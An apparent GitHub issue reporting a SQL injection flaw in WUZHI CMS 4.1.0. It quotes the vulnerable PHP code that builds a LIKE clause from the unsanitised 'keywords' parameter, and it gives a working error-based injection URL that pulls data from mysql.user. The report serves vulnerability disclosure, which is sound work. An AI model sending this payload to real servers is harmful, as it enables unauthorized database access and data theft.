A sql injection was discovered in WUZHI CMS 4.1.0 .There is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via the index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=54&_submenuid=54&keywords={sql payload}
filename
/coreframe/app/admin/copyfrom.php
code
publicfunctionlisting(){$siteid=get_cookie('siteid');$page=isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;$page=max($page,1);if(isset($GLOBALS['keywords'])){$keywords=$GLOBALS['keywords'];$where="`name` LIKE '%$keywords%'";}else{$where='';}$result=$this->db->get_list('copyfrom',$where,'*',0,20,$page);$pages=$this->db->pages;$total=$this->db->number;include$this->template('copyfrom_listing');}
filename
/coreframe/app/admin/copyfrom.phpcode
POC
index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=54&_submenuid=54&keywords=%27+and+updatexml(7,concat(0x7e,(select%20password_last_changed%20from%20mysql.user%20limit%201),0x7e),7)%23The text was updated successfully, but these errors were encountered: